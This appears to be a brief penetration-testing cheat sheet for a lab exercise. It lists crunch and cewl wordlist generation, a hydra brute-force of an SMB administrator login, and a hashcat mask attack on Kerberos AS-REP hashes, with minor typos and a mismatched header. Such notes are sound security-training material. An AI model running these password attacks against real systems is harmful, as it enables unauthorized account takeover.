==============================================================================
[+] Create Directories 
==============================================================================
# Crunch

crunch 4 6 0123456789ABCDEF -o crunch1.txt #From length 4 to 6 using that alphabet
crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha # Only length 4 using charset mixalpha

# cewl

ewl -d 2 -m 5 -w docswords.txt http://store.djewelry.htb/

==============================================================================
[+] Hydra 
==============================================================================
# Hydra 
hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt 10.10.10.10 smb


hashcat.exe -m 18200 -a 3 hash.txt ?u?l?l?l?l?l?l?l?l?d?s -o cracked.txt --force -D 1,2
